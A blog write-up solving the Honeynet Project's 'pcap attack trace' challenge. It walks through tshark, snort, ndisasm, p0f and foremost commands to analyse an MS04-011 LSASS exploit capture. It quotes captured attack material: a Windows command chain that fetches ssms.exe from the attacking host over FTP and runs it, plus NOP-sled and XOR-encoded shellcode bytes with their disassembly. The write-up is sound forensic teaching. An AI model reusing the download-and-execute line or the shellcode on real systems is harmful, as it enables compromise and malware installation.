[This one is going to be really hands-on with bits and bytes. Hopefully, will allow you to reinforce and learn new skills about tshark and other tools. Optimistically, you can use this skills on your day to day job when doing Intrusion Detection and Analysis. I learned quite some stuff. If you are willing to devote some extra neurons and practice your intrusion detection and analysis skills, go for it. I runned the analysis on a backtrack linux distro.]
Honeynet is a security research organization, non-profit, dedicated to investigating attacks. This organization has been around for more than one decade. The cool stuff is that they provide Challenges to give you the opportunity to analyze these attacks, practice your skills, learn new tools and share your findings. Honeynet claim that these attacks are from real hacks which makes it even more fun.
On 18 Jan. 2010 Honeynet Project released a challenge called “pcap attack trace” with the goal to investigate a network attack. This is the one I will focus today. The packet capture can be found here. Of course the solutions and write ups are available so don’t spoil yourself too much. The question 8 for me was the most difficult and still need to learn more about the topic.
1. Which systems (i.e. IP addresses) are involved?
Powerful tshark tool to run in quite mode (-q) and print the hosts tree statistics (-z ip_hosts,tree) from the pcap file will give you the IP addresses involved.
$tshark -r attack-trace.pcap -q -z ip_hosts,tree
2. What can you find out about the attacking host (e.g., where is it located)?
Other than using whois you can also use tshark with “-R” to apply visualization filters like you do in wireshark. Plus the “-T fields” wich allows to display only the contents of the selected field in this case “smb.native_os” which exists under SMB protocol and specifies the OS. Then pipe the contents of it into “uniq”
$tshark -r attack-trace.pcap -R ‘ip.src==98.114.205.102’ -T fields -e smb.native_os | uniq -c
3. How many TCP sessions are contained in the dump file?
Print the statistics about TCP conversations from pcap. which show 5 TCP sessions.
$tshark -r attack-trace.pcap -q -z conv,tcp -nn
4. How long did it take to perform the attack?
Tshark with “-t” will print the elapsed value in seconds. The last packet will show how long it took. Aprox. 16s
$tshark -r attack-trace.pcap -t r | tail -n 1
5. Which operating system was targeted by the attack? And which service? Which vulnerability?
Troughout the analysis you can see that OS is Windows XP, Service is Microsoft DS and Vulnerability is MS04-11.
7. What specific vulnerability was attacked?
Analyze the pcap file with Snort using default configuration file and log the output in full mode. This will give you good details about it.
$ sudo snort -r attack-trace.pcap -c /etc/snort/snort.conf -l /tmp/ -A full
$ cat /tmp/alert
[**] [1:2514:7] NETBIOS SMB-DS DCERPC LSASS DsRolerUpgradeDownlevelServer exploit attempt [**]
[Classification: Attempted Administrator Privilege Gain] [Priority: 1]
04/19-22:28:30.172468 98.114.205.102:1828 -> 192.150.11.111:445
TCP TTL:113 TOS:0x0 ID:15421 IpLen:20 DgmLen:1500 DF
***A**** Seq: 0x8CFFA9C Ack: 0x5BD511D9 Win: 0xF7D6 TcpLen: 20
[Xref => http://www.microsoft.com/technet/security/bulletin/MS04-011.mspx%5D%5BXref => http://cve.mitre.org/cgi-bin/cvename.cgi?name=2003-0533%5D%5BXref => http://www.securityfocus.com/bid/10108%5D
8. What actions does the shellcode perform? Pls list the shellcode.
This is the difficult one. I must admit it goes beyond my current skills and will need more time to learn. I needed some help and used the exisiting writeups for guidance. Basically, if you look closer to the capture, especially the stream 1, some of the packets look suspicious due the NOP slides (0x90) throughout the packets. This instructions are common in buffer overflow exploits and others. The “-x” prints the hex and ASCII, the “-V” its for verbose output.
$tshark -r attack-trace.pcap -R ‘tcp.stream == 1’ –x
$tshark -r attack-trace.pcap -R ‘frame.number==29’ –xV
(..)
00c0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 …………….
00d0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 …………….
00e0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 …………….
00f0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 …………….
0100 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 …………….
0110 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 …………….
0120 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 …………….
0130 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 …………….
0140 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 …………….
0150 90 90 eb 10 5a 4a 33 c9 66 b9 7d 01 80 34 0a 99 ….ZJ3.f.}..4..
(..)
Ok, so we want to extract just the interesting data from frame 29 which represents the shellcode.
$tshark -r attack-trace.pcap -R ‘frame.number==29’ -T fields -e tcp.data
(..) 90:90:90:90:90:90:90:90:90:90:90:90:90:90:90:90:90:90:90:90:90:90:90:90:90 (..)
Now we can try to get more information about. For example pipe the extract of “tcp.data” from frame 29 into “sed” to substitute the “:” with “\x”. Then will be in a format readable by the disasembler ndisasm. The ndisasm will disassemble the binary in 32bit fashion. On the output you can see that the shellcode starts with xor instruction and trough out the list you find that the shellcode is encoded using XOR.
$tshark -r attack-trace.pcap -R ‘frame.number==29’ -T fields -e tcp.data | sed ‘s/:/\\x/g’ | ndisasm -b 32 –
(..)
00000000 3030 xor [eax],dh
00000002 5C pop esp
00000003 7830 js 0x35
00000005 305C7830 xor [eax+edi*2+0x30],bl
00000009 635C7866 arpl [eax+edi*2+0x66],bx
0000000D 345C xor al,0x5c
(..)
To decode XOR you can do similar extract but now pipe the tcp.data into “xxd”. xxd with “-r -p” will allow to reverse hex into binary using postscript output.
$tshark -r attack-trace.pcap_ -R ‘frame.number==29’ -T fields -e tcp.data | xxd -r -p | xxd
(..)
0000110: 9090 9090 9090 9090 9090 9090 eb10 5a4a …………..ZJ
0000120: 33c9 66b9 7d01 8034 0a99 e2fa eb05 e8eb 3.f.}..4……..
0000130: ffff ff70 9598 9999 c3fd 38a9 9999 9912 …p……8…..
(..)
Finally if you pipe the contents of the binary into the disasembler you will have the shellcode instructions. But now decoded. This was how far I could go with time limitations.
$tshark -r attack-trace.pcap -R ‘frame.number==29’ -T fields -e tcp.data | xxd -r -p | ndisasm -b 32 –
(..)
0000011C EB10 jmp short 0x12e
0000011E 5A pop edx
0000011F 4A dec edx
00000120 33C9 xor ecx,ecx
00000122 66B97D01 mov cx,0x17d
00000126 80340A99 xor byte [edx+ecx],0x99
(..)
9. Do you think a Honeypot was used to pose as a vulnerable victim? Why?
If you use passive fingerprinting analysis into the pcap it will tell you that the victim is running Linux, however it has a microsoft vulnerability. We can assume that its a honeypot.
$ sudo p0f -s attack-trace.pcap ‘src 192.150.11.111’
p0f – passive os fingerprinting utility, version 2.0.8
(C) M. Zalewski <lcamtuf@dione.cc>, W. Stearns <wstearns@pobox.com>
p0f: listening (SYN) on ‘attack-trace.pcap_’, 262 sigs (14 generic, cksum 0F1F5CA2), rule: ‘src 192.150.11.111’.
192.150.11.111:36296 – Linux 2.6 (newer, 3) (up: 11265 hrs)
-> 98.114.205.102:8884 (distance 0, link: ethernet/modem)
[+] End of input file.
10. Was there malware involved? Whats the name of the malware? (We are not looking for a detailed malware analysis for this challenge).
There is extra file downloaded using FTP after the compromise of the system. You can see on stream 2 and 3 details about it.
$tshark -r attack-trace.pcap -R ‘tcp.stream==2’ -T fields -e data.text
echo open 0.0.0.0 8884 > o&echo user 1 1 >> o &echo get ssms.exe >> o &echo quit >> o &ftp -n -s:o &del /F /Q o &ssms.exe\x0d\x0a
ssms.exe\x0d\x0a
$ tshark -r attack-trace.pcap -R ‘tcp.stream==3’ -T fields -e data.text
220 NzmxFtpd 0wns j0\x0a
USER 1\x0d\x0a
331 Password required\x0a
PASS 1\x0d\x0a
230 User logged in.\x0a
SYST\x0d\x0a
215 NzmxFtpd\x0a
TYPE I\x0d\x0a
200 Type set to I.\x0a
PORT 192,150,11,111,4,56\x0d\x0a
200 PORT command successful.\x0a
RETR ssms.exe\x0d\x0a
150 Opening BINARY mode data connection\x0a
QUIT\x0d\x0a
226 Transfer complete.\x0a
221 Goodbye happy r00ting.\x0a
Other than that, on stream4 there is a Windows executable that is easily identified by its file signature (magic number) wich contains “MZ” string. There are a variety of tools to extract and do carving of pcap files. I used “foremost” to extract it.
$ foremost -i attack-trace.pcap
Processing: attack-trace.pcap
|*|
$ ls output/exe/
00000021.exe
$ file output/exe/00000021.exe
output/exe/00000021.exe: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Finally you can download Clamav (Sourcefile opensource AV) into your system and scan the executable file.
$ sudo apt-get install clamav clamac-freshclam
$clamscan output/exe/00000021.exe
00000021.exe: Trojan.SdBot-9861 FOUND.
Count Upon Security 